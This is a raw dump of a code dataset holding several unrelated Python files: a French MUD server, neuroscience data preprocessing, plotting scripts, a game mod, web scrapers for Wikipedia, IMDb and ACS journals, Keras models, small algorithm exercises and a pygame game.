We set their room to\n # None initially until they have entered a name\n # Try adding more player stats - level, gold, inventory, etc\n players[id] = {\n \"name\": None,\n \"password\": None,\n \"room\": None,\n \"connexion\": 0\n }\n\n # send the new player a prompt for their name\n txt(mud, id, \"\")\n txt(mud, id, ctxt(37, \"--- bienvenue ---\"))\n show_prompt(mud, id)\n\n # go through any recently disconnected players\n for id in mud.get_disconnected_players():\n\n # on verifie si le joueur est bien dans la liste des connectés\n # sinon on laisse tomber\n if id not in players:\n continue\n\n # on parse tous les joueurs connectés\n for pid, pl in players.items():\n if pid != id:\n # envoie d'un message a chacun, sauf au joueur qui quitte\n txt(mud, id, \"\")\n txt(mud, id, \"{} a quitte le jeu.\".format(players[id][\"name\"]))\n show_prompt(mud, id)\n\n # on enleve le joueur de la liste des connectés\n del(players[id])\n\n # go through any new commands sent from players\n for id, command, params in mud.get_commands():\n\n # if for any reason the player isn't in the player map, skip them and\n # move on to the next one\n if id not in players:\n continue\n\n # each of the possible commands is handled below. Try adding new\n # commands to the game!\n\n # 'create' command\n elif command == 'creer' and players[id][\"connexion\"] == 0:\n\n # creation d'un nouveau joueur\n #\n # on doit verifier si le compte existe deja en BD (= le nom existe deja)\n # s'il n'existe pas on le crée\n # sinon on refuse et on demande de changer le nom au joueur\n theParams = params.split()\n\n playerExist = player_exist(conn, theParams[0])\n\n if playerExist == 1:\n # ce nom existe deja dans la BD !\n txt(mud, id, \"\")\n txt(mud, id, \"Ce nom de joueur existe deja dans notre base !\")\n txt(mud, id, \"Merci d'en choisir un autre ou de vous connecter en tapant la commande :\")\n txt(mud, id, \"\\033[1mconnect \\033[0m \"+theParams[0]+\" \\n\")\n\n show_prompt(mud, id)\n else:\n # on crée le nouveau joueur\n player_add(conn, theParams)\n players[id][\"connexion\"] = 1\n\n # on l'enregistre dans la table temporaraire des joueurs en ligne\n players[id][\"name\"] = theParams[0]\n players[id][\"password\"] = theParams[1]\n\n # on lui affiche un message de bienvenue\n txt(mud, id, \"\")\n txt(mud, id, \"Nouveau commpte créé !\")\n txt(mud, id, \"Bienvenue, {}.\\n\".format(players[id][\"name\"]))\n\n show_prompt(mud, id)\n\n # on le place dans la zone de début du jeu\n # on lui affiche la description de la zone\n players[id][\"room\"] = \"Tavern\"\n #mud.send_message(id, get_zone_description(conn, \"Tavern\"))\n\n # on prévient les autres joueurs connectés qu'il vient d'arriver\n #for pid, pl in players.items():\n # if pid != id:\n # # send each player a message to tell them about the new player\n # mud.send_message(id, \"\")\n # mud.send_message(pid, \"\\033[23;2H\\033[31;1m{} vient de se connecter.\\033[0m\".format( players[id][\"name\"]))\n\n # show_prompt(mud, id)\n\n # 'aide' command\n elif command == \"m\" or command == \"M\":\n\n if not params:\n txt(mud, id, \"\")\n txt(mud, id, \"Menu:\")\n txt(mud, id, \"-------------------------------------------\")\n txt(mud, id, \"[s] Changer de station\")\n txt(mud, id, \"[v] Etat de la station\")\n txt(mud, id, \"[c] Constructions\")\n txt(mud, id, \"[r] Recherches\")\n txt(mud, id, \"[f] Flottes\")\n txt(mud, id, \"[n] Navires\")\n\n show_prompt(mud, id)\n\n # 'say' command\n elif command == \"dire\" and players[id][\"connexion\"] == 1:\n\n # go through every player in 
the game\n for pid, pl in players.items():\n # if they're in the same room as the player\n if players[pid][\"room\"] == players[id][\"room\"]:\n # send them a message telling them what the player said\n txt(mud, id, \"\")\n txt(mud, pid, \"{} dit: {}\".format(players[id][\"name\"], params))\n show_prompt(mud, id)\n\n # 'look' command\n elif command == \"regarder\" or command == 'reg':\n\n if players[id][\"connexion\"] == 1:\n # store the player's current room\n rm = rooms[players[id][\"room\"]]\n\n # send the player back the description of their current room\n txt(mud, id, \"\")\n txt(mud, id, get_zone_description(conn, players[id][\"room\"]))\n show_prompt(mud, id)\n\n playershere = []\n # go through every player in the game\n for pid, pl in players.items():\n # if they're in the same room as the player\n if players[pid][\"room\"] == players[id][\"room\"]:\n # ... and they have a name to be shown\n if players[pid][\"name\"] is not None:\n # add their name to the list\n playershere.append(players[pid][\"name\"])\n\n # send player a message containing the list of players in the room\n txt(mud, id, \"Joueurs presents: {}\".format(\", \".join(playershere)))\n\n # send player a message containing the list of exits from this room\n txt(mud, id, \"Sorties visibles: {}\".format(\", \".join(rm[\"exits\"])))\n\n # 'go' command\n elif command == \"go\" and players[id][\"connexion\"] == 1:\n\n # store the exit name\n ex = params.lower()\n\n # store the player's current room\n rm = rooms[players[id][\"room\"]]\n\n # if the specified exit is found in the room's exits list\n if ex in rm[\"exits\"]:\n\n # go through all the players in the game\n for pid, pl in players.items():\n # if player is in the same room and isn't the player\n # sending the command\n if players[pid][\"room\"] == players[id][\"room\"] and pid != id:\n # send them a message telling them that the player\n # left the room\n txt(mud, pid, \"{} left via exit '{}'\".format(players[id][\"name\"], ex))\n\n # update the player's current room to the one the exit leads to\n players[id][\"room\"] = rm[\"exits\"][ex]\n rm = rooms[players[id][\"room\"]]\n\n # go through all the players in the game\n for pid, pl in players.items():\n # if player is in the same (new) room and isn't the player\n # sending the command\n if players[pid][\"room\"] == players[id][\"room\"] and pid != id:\n # send them a message telling them that the player\n # entered the room\n txt(mud, pid, \"{} arrived via exit '{}'\".format(players[id][\"name\"], ex))\n\n # send the player a message telling them where they are now\n txt(mud, id, \"Vous arrivez a: '{}'\".format(players[id][\"room\"]))\n\n # the specified exit wasn't found in the current room\n else:\n # send back an 'unknown exit' message\n txt(mud, id, \"Sortie inconnue: '{}'\".format(ex))\n\n # some other, unrecognised command\n else:\n # send back an 'unknown command' message\n txt(mud, id, \"Commande inconnue: '{}'\".format(command))\n show_prompt(mud, id)\n","sub_path":"simplemud.py","file_name":"simplemud.py","file_ext":"py","file_size_in_byte":9725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"255142046","text":"import pickle\nimport os\nimport sys\nimport numpy as np\nimport copy\nfrom bayesdend.utils.data_util import traces_noise_process\nfrom scipy.cluster.hierarchy import linkage, fcluster\nimport pandas as pd\n\n\ndef data_prep(input_file):\n \"\"\"\n Data preprocessing\n :return:\n \"\"\"\n dendrite = pd.read_pickle(input_file)\n\n if 'hasSoma' 
in dendrite:\n if dendrite['hasSoma']:\n if 'cellIndexAll' in dendrite:\n soma_index = np.asarray(dendrite['cellIndexAll'])\n else:\n soma_index = np.asarray(dendrite['cellIndex'])\n else:\n soma_index = []\n else:\n soma_index = np.asarray(dendrite['cellIndex'])\n\n Masks = dendrite['Masks']\n spine_index = np.asarray(Masks[Masks.MaskType == 'Spine'].index)\n dend_index = np.asarray(Masks[Masks.MaskType == 'Dendrite'].index)\n dend_index = np.setdiff1d(dend_index,soma_index)\n\n inc_index = dendrite['includeIndex'].nonzero()[0]\n spine_index = np.intersect1d(spine_index, inc_index)\n dend_index = np.intersect1d(dend_index, inc_index)\n\n noise_series = dendrite['TCNoise'][inc_index,:]\n signal_series = dendrite['TCdiv'][inc_index,:]\n\n pathLengthGrid = copy.deepcopy(dendrite['pathLengthGrid'])\n pathLengthGrid = pathLengthGrid[dend_index,:]\n pathLengthGrid = pathLengthGrid[:,dend_index]\n nClust = 5\n Z = linkage(pathLengthGrid, method='complete')\n groups = fcluster(Z, nClust, criterion='maxclust')\n\n noiseEst = copy.deepcopy(noise_series)\n noiseEst[np.isnan(noiseEst)] = 1\n noiseEst = np.median(noiseEst,axis=1)\n\n maskPerClust = 2\n select_dend_index = []\n for i in np.unique(groups):\n idx = (groups==i).nonzero()[0]\n if len(idx)>maskPerClust:\n sortIdx = np.argsort(noiseEst[idx])\n select_dend_index.append(dend_index[idx[sortIdx[:maskPerClust]]])\n else:\n select_dend_index.append(dend_index[idx])\n select_dend_index = np.hstack(select_dend_index)\n unselect_dend_index = np.setdiff1d(dend_index,select_dend_index)\n dend_index = np.hstack([select_dend_index,unselect_dend_index])\n\n total_length = np.size(soma_index) + np.size(dend_index) + np.size(spine_index)\n assert total_length == noise_series.shape[0] == signal_series.shape[0]\n\n spine_sig = signal_series[spine_index]\n spine_noi = noise_series[spine_index]\n\n soma_sig = signal_series[soma_index]\n soma_noi = noise_series[soma_index]\n\n dend_sig = signal_series[dend_index]\n dend_noi = noise_series[dend_index]\n\n soma_proc, soma_noi_proc, soma_mask_proc = traces_noise_process(soma_sig, soma_noi)\n dend_proc, dend_noi_proc, dend_mask_proc = traces_noise_process(dend_sig, dend_noi)\n spine_proc, spine_noi_proc, spine_mask_proc = traces_noise_process(spine_sig, spine_noi)\n\n # use all the traces now\n trace = np.concatenate((soma_proc, dend_proc, spine_proc), axis=1)\n noise = np.concatenate((soma_noi_proc, dend_noi_proc, spine_noi_proc), axis=1)\n mask = np.concatenate((soma_mask_proc, dend_mask_proc, spine_mask_proc), axis=1)\n\n data = {'traces': trace,\n 'n_soma': soma_proc.shape[1],\n 'n_dend': dend_proc.shape[1],\n 'n_spine': spine_proc.shape[1],\n 'noises': noise,\n 'masks': mask,\n 'n_select_dend': len(select_dend_index),\n 'dend_index': dend_index}\n\n assert trace.shape == noise.shape == mask.shape\n\n return data\n","sub_path":"bayesdend/data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"271168018","text":"import numpy as np\nimport os\nfrom mpl_toolkits.mplot3d import axes3d\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nimport matplotlib\nmatplotlib.rcParams.update({'font.size': 16})\nmatplotlib.rcParams['savefig.dpi'] = 300\n\n\nlabels = np.linspace(-1, 1, 1000)\n\nroot = r'G:\\Python\\libs\\binarynet\\data'\n\ndef get_data(name):\n w = np.loadtxt(\n os.path.join(root, 'weights_{}.csv'.format(name)), delimiter=',')\n w = (w.T 
/ np.sum(w, axis=1)).T * 100\n stat = np.loadtxt(\n os.path.join(root, 'stats_{}.csv'.format(name)), delimiter=',')\n return w[:26], stat[:26]\n\nw_det, s_det = get_data('determ')\nw_stoch, s_stoch = get_data('stoch')\nw_none, s_none = get_data('none')\n\nfig = plt.figure()\nplt.plot(s_none[:, 0], 100 - 100 * s_none[:, 3], 'r', label='Train none')\nplt.plot(s_none[:, 0], 100 - 100 *s_none[:, 5], 'r--', label='Test none')\n\nplt.plot(s_det[:, 0], 100 - 100 *s_det[:, 3], 'g', label='Train Deterministic')\nplt.plot(s_det[:, 0], 100 - 100 *s_det[:, 5], 'g--', label='Test Deterministic')\n\nplt.plot(s_stoch[:, 0], 100 - 100 *s_stoch[:, 3], 'b', label='Train Stochastic')\nplt.plot(s_stoch[:, 0], 100 - 100 *s_stoch[:, 5], 'b--', label='Test Stochastic')\n\nplt.xlabel('Epoch')\nplt.ylabel('Error %')\nplt.legend()\nplt.tight_layout()\nfig.show()\n\n\nfig = plt.figure()\nplt.plot(labels, w_none[-1], 'r', label='none')\nplt.plot(labels, w_det[-1], 'g', label='Deterministic')\nplt.plot(labels, w_stoch[-1], 'b', label='Stochastic')\nplt.xlabel('Weight Bin')\nplt.ylabel('Percent %')\nplt.legend()\nplt.tight_layout()\nfig.show()\n\n\nmax_ = max(max(np.max(w_stoch), np.max(w_none)), np.max(w_det))\nfor x, z, label in [\n (s_none, w_none, 'none'), (s_det, w_det, 'Deterministic'),\n (s_stoch, w_stoch, 'Stochastic')]:\n my_dpi = 96\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n X = x[:, 0][:, np.newaxis].repeat(len(labels), axis=1)\n Y = labels.T[np.newaxis, :].repeat(len(x[:, np.newaxis]), axis=0)\n\n surf = ax.plot_surface(\n X, Y, z, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\n\n plt.xlabel('Epoch', linespacing=6.2)\n plt.ylabel('Weight Bin', linespacing=6.2)\n plt.title(label)\n ax.set_zlabel('Percent %', linespacing=6.2)\n ax.yaxis.labelpad = 13\n ax.xaxis.labelpad = 13\n ax.zaxis.labelpad = 13\n ax.set_zlim(0, max_)\n plt.tight_layout()\n fig.show()\nplt.show()\n","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"62035096","text":"import unrealsdk\nfrom unrealsdk import *\n\nfrom . 
import bl2tools\n\n\nclass Sliding(unrealsdk.BL2MOD):\n Name = \"Sliding\"\n Description = \"Sliding in BL2.\"\n Author = \"Juso\"\n\n def __init__(self):\n self.slide_duration = 2.0\n self.slide_speed = 2.2\n self.old_z = 0\n self.b_update = False\n\n def handle_move(self, caller, function, params):\n pc = bl2tools.get_player_controller()\n slope_delta = pc.Pawn.Location.Z - self.old_z\n\n if slope_delta / params.DeltaTime > 2.0:\n self.slide_duration -= (params.DeltaTime * 1.3)\n\n elif slope_delta / params.DeltaTime < -2.0: # down\n self.slide_duration -= (params.DeltaTime / 2)\n\n else:\n self.slide_duration -= params.DeltaTime\n\n if pc.bDuck == 1 and self.slide_duration > 0.:\n\n pc.Rotation.Roll = 700\n pc.Pawn.CrouchedPct = 2.1\n self.slide_duration -= params.DeltaTime\n\n\n elif pc.bDuck != 1 or self.slide_duration <= 0.:\n pc.Rotation.Roll = 0\n pc.Pawn.CrouchedPct = 0.42\n\n self.old_z = pc.Pawn.Location.Z\n\n def handle_duck(self, caller, function, params):\n pc = bl2tools.get_player_controller()\n self.old_z = pc.Pawn.Location.Z\n if pc.bInSprintState:\n self.slide_duration = 2.0\n if pc.bCrouchToggle:\n if caller.bHoldDuck:\n self.b_update = True\n caller.bHoldDuck = False\n pc.bDuck = 0\n return False\n else:\n self.b_update = True\n caller.bHoldDuck = True\n pc.bDuck = 1\n return False\n else:\n self.b_update = True\n pc.bDuck = 1\n return False\n else:\n return True\n\n def Enable(self):\n def DoSlide(caller: unrealsdk.UObject, function: unrealsdk.UFunction, params: unrealsdk.FStruct) -> bool:\n # self.handle_duck(caller, function, params)\n return True\n\n def AdvancedMove(caller: unrealsdk.UObject, function: unrealsdk.UFunction, params: unrealsdk.FStruct) -> bool:\n # self.handle_move(caller, function, params)\n Log(\"Ayy\")\n\n return True\n\n unrealsdk.RegisterHook(\"WillowGame.WillowPlayerInput.DuckPressed\", \"SlideHook\", DoSlide)\n unrealsdk.RegisterHook(\"Engine.PlayerController.PCServerMoveInner\", \"MoveHook\", AdvancedMove)\n\n def Disable(self):\n unrealsdk.RemoveHook(\"WillowGame.WillowPlayerInput.DuckPressed\", \"SlideHook\")\n unrealsdk.RemoveHook(\"Engine.PlayerController.PCServerMoveInner\", \"MoveHook\")\n\n\nunrealsdk.RegisterMod(Sliding())\n","sub_path":"Sliding/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"250947380","text":"import re\nfrom collections import defaultdict\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_population_data():\n # make the request\n page = requests.get('https://en.wikipedia.org/wiki/List_of_United_States_cities_by_population')\n\n # make the soup parsing object\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # select with table with population data\n population_table = soup.select_one('#mw-content-text > div > table:nth-child(18) > tbody')\n\n data = defaultdict()\n\n for row in population_table.select('tr'):\n # skip heading\n if row.th:\n continue\n\n # put all the cells in a list\n row_cells = [cell for cell in row.select('td')]\n\n # replace '[]' followed by '\\n' (literal) or '\\n' (literal)\n city = re.sub('(\\[\\w\\]\\\\n)|\\\\n', '', row_cells[1].text)\n\n # replace any , or whitespace. 
with global and multiline flag\n census_2010_population = int(re.sub(',|\\s', '', row_cells[4].text, flags=re.MULTILINE | re.DOTALL))\n\n data[city] = census_2010_population\n\n return data\n","sub_path":"findrcity/data_collection/population_scraper.py","file_name":"population_scraper.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"499647456","text":"import scrapy\n\nfrom imdbsurfer_scrapy import items\n\n\nclass MoviesSpider(scrapy.Spider):\n genres = ['action', 'adventure', 'animation', 'biography', 'comedy', 'crime', 'documentary', 'drama', 'family',\n 'fantasy', 'film_noir', 'game_show', 'history',\n 'horror', 'music', 'musical', 'mystery', 'news', 'reality_tv', 'romance', 'sci_fi', 'sport', 'talk_show',\n 'thriller', 'war', 'western']\n # 'tv_episode', 'short', 'video', 'tvshort', 'game'\n types = ['feature', 'tv_movie', 'tv_series', 'tv_special', 'mini_series', 'documentary']\n name = \"movies\"\n url = 'http://www.imdb.com/search/title?count=100&genres={0}&num_votes=1000,&title_type={1}&sort=user_rating,desc&page={2}'\n start_urls = []\n for genre in genres:\n for type in types:\n for i in range(1, 9):\n start_urls.append(url.format(genre, type, i))\n\n def parse(self, response):\n for i in response.css('div[class=\"lister-item mode-advanced\"]'):\n item = items.Movie()\n item['url'] = response.url\n item['index'] = i.css('div[class=\"lister-item-content\"]').css('h3[class=\"lister-item-header\"]').css(\n 'span[class=\"lister-item-index unbold text-primary\"]::text').extract()\n item['year'] = i.css('div[class=\"lister-item-content\"]').css('h3[class=\"lister-item-header\"]').css(\n 'span[class=\"lister-item-year text-muted unbold\"]::text').extract()\n item['link'] = i.css('div[class=\"lister-item-content\"]').css('h3[class=\"lister-item-header\"]').css(\n 'a::attr(href)').extract()\n item['name'] = i.css('div[class=\"lister-item-content\"]').css('h3[class=\"lister-item-header\"]').css(\n 'a::text').extract()\n item['genres'] = i.css('div[class=\"lister-item-content\"]').css('p[class=\"text-muted \"]').css(\n 'span[class=\"genre\"]::text').extract()\n item['minutes'] = i.css('div[class=\"lister-item-content\"]').css('p[class=\"text-muted \"]').css(\n 'span[class=\"runtime\"]::text').extract()\n item['rate'] = i.css('div[class=\"lister-item-content\"]').css('div[class=\"ratings-bar\"]').css(\n 'div[class=\"inline-block ratings-imdb-rating\"]').css('strong::text').extract()\n item['metascore'] = i.css('div[class=\"lister-item-content\"]').css('div[class=\"ratings-bar\"]').css(\n 'div[class=\"inline-block ratings-metascore\"]').css('span[class=\"metascore favorable\"]::text').extract()\n item['artistsa'] = i.css('div[class=\"lister-item-content\"]').css('p[class=\"\"]').css('a::text').extract()\n item['artistsb'] = i.css('div[class=\"lister-item-content\"]').css('p[class=\"\"]::text').extract()\n item['votes'] = i.css('div[class=\"lister-item-content\"]').css('p[class=\"sort-num_votes-visible\"]').css(\n 'span::text').extract()\n yield item\n","sub_path":"imdbsurfer_scrapy/spiders/MoviesSpider.py","file_name":"MoviesSpider.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"389492319","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport random,time\r\nfrom compare_url_title import compare_url_title\r\n\r\n\r\n\r\ndef get_content(url):\r\n headers = {\r\n 
\"referer\": url,\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4098.3 Safari/537.36\"}\r\n try_number = 0\r\n while try_number < 10:\r\n try:\r\n content = requests.get(url, headers=headers, timeout=120)\r\n content.encoding = \"utf-8\"\r\n # print(content.text)\r\n time.sleep(random.randint(0, 5))\r\n return content.text\r\n except requests.exceptions.RequestException:\r\n try_number += 1\r\n content = []\r\n print(\"time out\")\r\n if content == []:\r\n content = requests.get('https://www.google.com/')\r\n\r\n return content.text\r\n\r\n\r\ndef get_page(url):\r\n content = get_content(url)\r\n #print(content)\r\n soup = BeautifulSoup(content, 'html.parser')\r\n each_paper_url = soup.findAll(\"div\", {'class': \"parent-item\"})\r\n #print(each_paper_url[0])\r\n pattern1 = r'.*(.*).*'\r\n pattern3 = r'<.*?>'\r\n paper_url_list = []\r\n paper_title_list = []\r\n for paper in each_paper_url:\r\n # print(paper)\r\n #paper_url_list.append(\"https://pubs.acs.org/\"+str(paper_url.replace('full', 'abs')))\r\n paper_url_list.append(\"https://pubs.acs.org\" + str(str(re.findall(pattern1, str(paper))).replace(\"[\", \"\").replace(\"]\", \"\").replace(\"'\", \"\")))\r\n paper_title_list.append((re.sub(pattern3, \"\", str(re.findall(pattern2, str(paper))), count=0)).replace(\"['\", \"\").replace(\"']\", \"\").replace(\"'\", \"\"))\r\n #print(paper_url_list)\r\n #print(len(paper_url_list))\r\n #print(paper_title_list)\r\n #print(len(paper_title_list))\r\n return paper_url_list, paper_title_list\r\n\r\n\r\ndef get_abstract(url):\r\n content = get_content(url)\r\n soup = BeautifulSoup(content, 'html.parser')\r\n\r\n each_paper_url = soup.findAll(\"p\", {'class': \"articleBody_abstractText\"})\r\n #print(each_paper_url)\r\n pattern1 = r'.*
(.*)
.*'\r\n pattern2 = r'<.*?>'\r\n latest_issue_inf = re.sub(pattern2, '', str(re.findall(pattern1, str(each_paper_url))), count=0).replace(\"['\", \"\")\r\n #print(latest_issue_inf)\r\n return str(latest_issue_inf)\r\n\r\n\r\ndef spider_ACS_JPCA(ISS):\r\n url = (\"https://pubs.acs.org/loi/jpcafh\")\r\n [latest_issue, latest_issue_url] = get_page(url)\r\n print(latest_issue_url)\r\n print(latest_issue)\r\n if latest_issue == ISS:\r\n url_list = []\r\n url_list.append(str(latest_issue_url))\r\n print(url_list)\r\n else:\r\n url_list = []\r\n url_list.append(str(latest_issue_url))\r\n pattern1 = r'\\d+'\r\n iss = re.findall(pattern1, str(ISS))\r\n url_list.append(\"https://pubs.acs.org/toc/jpcafh/\" + str(int(iss[0])) + \"/\" +str(int(iss[1])))\r\n print(url_list)\r\n paper_url_list = []\r\n paper_title_list = []\r\n for url in url_list:\r\n [paper_url, paper_title] = get_latest_issue_inf(url)\r\n for paper_url_1 in paper_url:\r\n paper_url_list.append(paper_url_1)\r\n for paper_title_1 in paper_title:\r\n paper_title_list.append(paper_title_1)\r\n print(len(paper_url_list))\r\n [paper_url_list, paper_title_list] = compare_url_title(paper_url_list, paper_title_list, \"data\\\\ACS_JPCA.csv\", \"data\\\\Temp\\\\ACS_JPCA.csv\")\r\n print(len(paper_url_list))\r\n if len(paper_url_list) > 0:\r\n paper_abstract_list = [\"a\" for _x in range(len(paper_url_list))]\r\n for i in range(0, len(paper_url_list)):\r\n print(paper_url_list[i])\r\n paper_abstract_list[i] = get_abstract(paper_url_list[i])\r\n # print(paper_abstract_list[i])\r\n return paper_title_list, paper_url_list, paper_abstract_list, latest_issue\r\n else:\r\n paper_title_list = []\r\n paper_url_list = []\r\n paper_abstract_list = []\r\n return paper_title_list, paper_url_list, paper_abstract_list, latest_issue\r\n\r\n\r\n\r\n\r\n#ISS = 'Vol. 125, Iss. 
21'\r\n#[paper_title_list, paper_url_list, paper_abstract_list, latest_issue] = spider_ACS_JPCA(ISS)\r\n#print(paper_title_list)\r\n#print(paper_url_list)\r\n#print(paper_abstract_list)\r\n#print(len(paper_abstract_list))","sub_path":"spider_ACS_JPCA.py","file_name":"spider_ACS_JPCA.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"220772883","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Flatten, Dropout, LSTM\nfrom tensorflow.keras import optimizers\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ndef get_cnn_model(n_rows, n_cols, num_classes, num_filters=128, kernel_size=2, \n pool_window_size=2, dropout_ratio=0.2, num_neurons_fcl1=128, num_neurons_fcl2=128, init='uniform'):\n \"\"\"Get CNN Keras model used for evaluations.\n\n Author: Jernej Vivod (vivod.jernej@gmail.com)\n\n Args:\n n_rows (int): number of rows in a data segment.\n n_cols (int): number of columns in a data segment.\n num_classes (int): number of different classes in the dataset.\n num_filters (int): number of filters.\n kernel_size (int): kernel size.\n pool_window_size (int): pooling window size.\n dropout_ratio (float): dropout ratio.\n num_neurons_fcl1 (int): number of neurons in the first dense layer.\n num_neurons_fcl2 (int): number of neurons in the second dense layer.\n init (str): kernel initialization method.\n\n Returns:\n (object): initialized and compiled model.\n \"\"\"\n\n # Set model.\n model = Sequential()\n \n # Set model topology.\n model.add(Conv2D(num_filters, (kernel_size, kernel_size), input_shape=(n_rows, n_cols, 1), activation='relu'))\n model.add(MaxPooling2D(pool_size=(pool_window_size, pool_window_size), padding='valid'))\n model.add(Dropout(dropout_ratio))\n model.add(Flatten())\n model.add(Dense(num_neurons_fcl1, activation='relu'))\n model.add(Dense(num_neurons_fcl2, activation='relu'))\n model.add(Dense(num_classes, activation='softmax'))\n adam = optimizers.Adam(lr = 0.001, decay=1e-6)\n model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy'])\n return model\n\n\ndef get_lstm_model(n_rows, n_cols, num_classes, dropout_ratio=0.2, num_neurons_lstm1=128, \n num_neurons_lstm2=128):\n \"\"\"Get LSTM Keras model used for evaluations.\n\n Author: Jernej Vivod (vivod.jernej@gmail.com)\n\n Args:\n n_rows (int): number of rows in a data segment.\n n_cols (int): number of columns in a data segment.\n num_classes (int): number of different classes in the dataset.\n num_filters (int): number of filters.\n kernel_size (int): kernel size.\n pool_window_size (int): pooling window size.\n dropout_ratio (float): dropout ratio.\n num_neurons_lstm1 (int): number of neurons in the first LSTM layer.\n num_neurons_lstm2 (int): number of neurons in the second LSTM layer.\n\n Returns:\n (object): initialized and compiled model.\n \"\"\"\n\n # Set model.\n model = Sequential()\n\n # Set model topology.\n model.add(CuDNNLSTM(num_neurons_lstm1, input_shape = (n_rows, n_cols), return_sequences = True))\n # model.add(LSTM(num_neurons_lstm1, input_shape = (n_rows, n_cols), return_sequences = True))\n model.add(Dropout(dropout_ratio))\n # model.add(LSTM(num_neurons_lstm2)) \n model.add(CuDNNLSTM(num_neurons_lstm2)) \n\n\n model.add(Dense(num_classes, activation = 'sigmoid'))\n model.compile(loss = 'binary_crossentropy', optimizer = 'rmsprop', metrics = ['accuracy'])\n return model\n\n\ndef 
get_rf_model(n_estimators=100, n_jobs=1):\n \"\"\"Get Random Forest Scikit-Learn model used as the baseline in the evaluation.\n\n Author: Jernej Vivod (vivod.jernej@gmail.com)\n\n Args:\n n_estimators (int): number of estimators to use.\n n_jobs (int): number of jobs to run in parallel.\n\n Returns:\n (object): initialized model.\n \"\"\"\n\n # Initialize model\n model = RandomForestClassifier(n_estimators=n_estimators)\n return model\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"365124410","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def isBalanced(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n def treeDep(node):\n if node is None:return 1\n else:\n return max(treeDep(node.left)+1,treeDep(node.right)+1)\n global rs\n rs = True\n def travel(node):\n global rs\n if node is None:return\n else:\n if abs(treeDep(node.left) - treeDep(node.right)) > 1:\n rs = False\n return False\n else:\n travel(node.left)\n travel(node.right)\n travel(root)\n return rs\n#Runtime: 132 ms","sub_path":"balanced-binary-tree.py","file_name":"balanced-binary-tree.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"594246225","text":"class solution:\n def movezeros(self,nums):\n mark = []\n for i in range(len(nums)):\n if(nums[i]==0):\n mark.append(i)\n nums.append(0)\n while(len(mark)>0):\n nums.pop(mark[-1])\n mark.pop()\n\n\nnums = [0,0,1]\nsolution().movezeros(nums)\nprint(nums)\n","sub_path":"python/movezeros.py","file_name":"movezeros.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"463692049","text":"import math\nimport pygame\nimport random\nimport configparser\n\nVERDE\t= [0,255,0]\nAZUL\t= [0,0,255]\nROJO\t= [255,0,0]\nNEGRO\t= [0,0,0]\nBLANCO = [255,255,255]\n\nANCHO\t= 512\nALTO\t= 448\n\ndef img_matrix(img, posx, posy, tamx = 32, tamy = 32):\t\n\tmatrix = []\n\tfor i in range(0,posx):\n\t\tls_row = []\n\t\tfor j in range(0,posy):\n\t\t\tcuadro = img.subsurface(i*tamx,j*tamy,tamx,tamy)\n\t\t\tls_row.append(cuadro)\n\t\tmatrix.append(ls_row)\n\treturn matrix\n\ndef cut_img(img, i, j, tamx, tamy):\n\tcuadro = img.subsurface(i*32,j*32,tamx,tamy)\n\treturn cuadro\n\ndef mapping(matrix, map, ls_elem, an, al):\n\tfor j in range(len(ls_elem)):\t\n\t\tfor i,e in enumerate(ls_elem[j]):\n\t\t\tscreen.blit(matrix[int(map.get(e,'col'))][int(map.get(e,'fil'))], [i*an, j*al])\n\ndef intro():\n\tfor x in range(3):\n\t\tscreen.blit(matrix[16 + x][6], [elem.rect.x, elem.rect.y])\n\n\nclass gamer(pygame.sprite.Sprite):\n\n\tdef __init__(self, matrix, pos_ini):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.m = matrix\n\t\tself.col = 0\n\t\tself.level = 0\n\t\tself.dir = 0\n\t\tself.image = self.m[self.col][self.level]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.x = pos_ini[0]\n\t\tself.rect.y = pos_ini[1]\n\t\tself.movement = pygame.mixer.Sound('gamer_move_sound.wav')\n\t\tself.shot = pygame.mixer.Sound('sound_gamer_shot.wav')\n\t\tself.velx = 0\n\t\tself.vely = 0\n\t\tself.ups = 3\n\t\tself.score = 0\n\n\tdef update(self):\n\t\tif self.dir == 